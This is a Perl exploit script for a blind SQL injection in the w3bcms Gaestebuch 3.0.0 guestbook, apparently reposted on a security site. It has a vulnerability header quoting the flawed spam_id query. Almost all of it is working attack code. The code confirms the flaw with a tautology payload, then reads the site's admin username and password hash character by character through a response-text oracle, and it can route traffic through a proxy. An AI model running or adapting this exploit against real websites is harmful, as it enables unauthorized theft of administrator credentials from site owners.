w3bcms Gaestebuch 3.0.0 Blind SQL Injection Exploit
来源:www.vfcocus.net 作者:DNX 发布时间:2009-04-13  
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use Getopt::Long;

#                           \#'#/
#                           (-.-)
#    ------------------oOO---(_)---OOo-----------------
#    |          __             __                     |
#    |    _____/ /_____ ______/ /_  __  ______ ______ |
#    |   / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
#    |  (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )  |
#    | /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/   |
#    | Security Research Division      /____/ 2oo9    |
#    --------------------------------------------------
#    |  w3bcms Gaestebuch v3.0.0 Blind SQL Injection  |
#    |       (requires magic_quotes_gpc = Off)        |
#    --------------------------------------------------
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.w3bcms.de
# [!] Detected...: 26.03.2009
# [!] Reported...: 29.03.2009
# [!] Response...: xx.xx.2009
#
# [!] Background.: CMS features in the frontend:
#                  » Ausgabe angelegter Seiten
#                  » Integrierter sicherer Spamschutz (kein Captcha!)
#                  » CMS Features wie Slogan Rotation, Datumausgabe, Seitenanzeige
#                  » Integrierter Besuchercounter (versteckt/sichtbar)
#                  » Sicherheit gegen Hackangriffe
#                  » Schnelle Datenbankabfragen
#                  » 100% Suchmaschinenoptimiert (SEO)
#                  » Erweiterbar durch Module & Addons
#                  » Unterstützt Mod Rewrite URL's (optional)
#
# [!] Bug........: $_POST['spam_id'] in includes/module/book/index.inc.php near line 42
#
#                  37: } else if (isset($_GET['action']) && $_GET['action'] == "eintragen" && $modul_settings['aktiv'] == "0") {
#                  38:
#                  39:         $_POST['spamschutz'] = mysql_real_escape_string($_POST['spamschutz']);
#                  40:         $_POST['spamschutz'] = strtolower($_POST['spamschutz']);
#                  41:
#                  42:         $data = mysql_fetch_assoc(mysql_query("SELECT * FROM spamschutz WHERE id='".$_POST['spam_id']."' AND antwort='".$_POST['spamschutz']."'"));
#
# [!] Solution...: no response from vendor but the vendor has updated the module package
#

# Fewer than three command-line words (target switch, -u, URL) means there
# is nothing to do: print the banner plus usage text and stop.
unless ($ARGV[2]) {
  print "\n", <<'USAGE';
                        \#'#/                     
                        (-.-)                      
   ----------------oOO---(_)---OOo-----------------
   | w3bcms Gaestebuch v3.0.0 Blind SQL Injection |
   |                coded by DNX                  |
   ------------------------------------------------
[!] Usage: perl w3bcms.pl [Target] <Options>
[!] Example: perl w3bcms.pl -2 -u "http://127.0.0.1/w3b/index.php?seite=2.gaestebuch"
[!] Targets:
       -1              Get admin username
       -2              Get admin password hash
[!] Options:
       -u [url]        URL to vuln website
       -p [ip:port]    Proxy support
USAGE
  exit;
}

# Parse switches: -1 / -2 choose what to read back, -u the guestbook URL,
# -p an optional HTTP proxy.  The user agent stays file-scoped because the
# request helpers further down share it.
my %options = ();
GetOptions(\%options, "1", "2", "u=s", "p=s");
my $ua     = LWP::UserAgent->new();
my $target = $options{"u"} . "&action=eintragen";

# Route every request through the proxy when one was given (ip:port).
$ua->proxy('http', "http://" . $options{"p"}) if $options{"p"};

print "[!] Exploiting...\n";

# check_bug() exits the process itself when the page does not react.
check_bug($target);

# Dispatch on the selected target; -1 takes precedence when both are set.
if ($options{"1"}) {
  get_username($target);
}
elsif ($options{"2"}) {
  get_password($target);
}

print "\n[!] Exploit done\n";

# Probe the injection point once: a tautology in spam_id is sent and the
# response is searched for the German name prompt.  That string is the
# boolean oracle the character-by-character reads below rely on, so when
# it is absent the whole run is abandoned (exit).  Uses the file-scoped $ua.
sub check_bug {
  my ($url) = @_;
  syswrite(STDOUT, "[!] Checking bug @ website: ");
  my $probe    = "' or 1=1/*";
  my $response = $ua->request(POST $url, [spam_id => $probe]);
  unless ($response->content =~ /Bitte geben Sie Ihren Namen an/) {
    syswrite(STDOUT, "not vuln");
    exit;
  }
  syswrite(STDOUT, "vuln");
  print "\n";
}

# Read the "benutzername" column one position at a time (positions 1..32),
# trying printable ASCII 32..126 at each position and echoing the first code
# the oracle confirms.  A position where nothing matches prints nothing.
sub get_username {
  my ($target) = @_;
  syswrite(STDOUT, "[!] Get username: ");
  for my $pos (1 .. 32) {
    for my $code (32 .. 126) {
      next unless exploit($target, $pos, $code, "benutzername");
      syswrite(STDOUT, chr($code), 1);
      last;
    }
  }
}

# Read the "passwort" column the same way as the username, but only over the
# hex alphabet: codes 48..57 are '0'..'9', 97..102 are 'a'..'f' (the usage
# text calls this value a hash).  Each position stops at the first confirmed
# code; an unmatched position prints nothing.
sub get_password {
  my ($target) = @_;
  syswrite(STDOUT, "[!] Get Hash: ");
  my @hex_codes = (48 .. 57, 97 .. 102);
  for my $pos (1 .. 32) {
    for my $code (@hex_codes) {
      next unless exploit($target, $pos, $code, "passwort");
      syswrite(STDOUT, chr($code), 1);
      last;
    }
  }
}

# One oracle query: does character $i of column $c (first row of "admin")
# equal ASCII code $h?  Returns 1 when the response carries the name prompt
# (condition true), 0 otherwise.  Uses the file-scoped $ua.  The payload only
# works because spam_id reaches the SQL string unescaped (see the quoted
# index.inc.php line 42 in the header); escaping or a parameterized query
# on that field closes the hole.
sub exploit {
  my ($url, $i, $h, $c) = @_;
  my $inj = "' or 1=1 and substring((select $c FROM admin limit 1),$i,1)=CHAR($h)/*";
  my $res = $ua->request(POST $url, [spam_id => $inj]);
  return ($res->content =~ /Bitte geben Sie Ihren Namen an/) ? 1 : 0;
}


 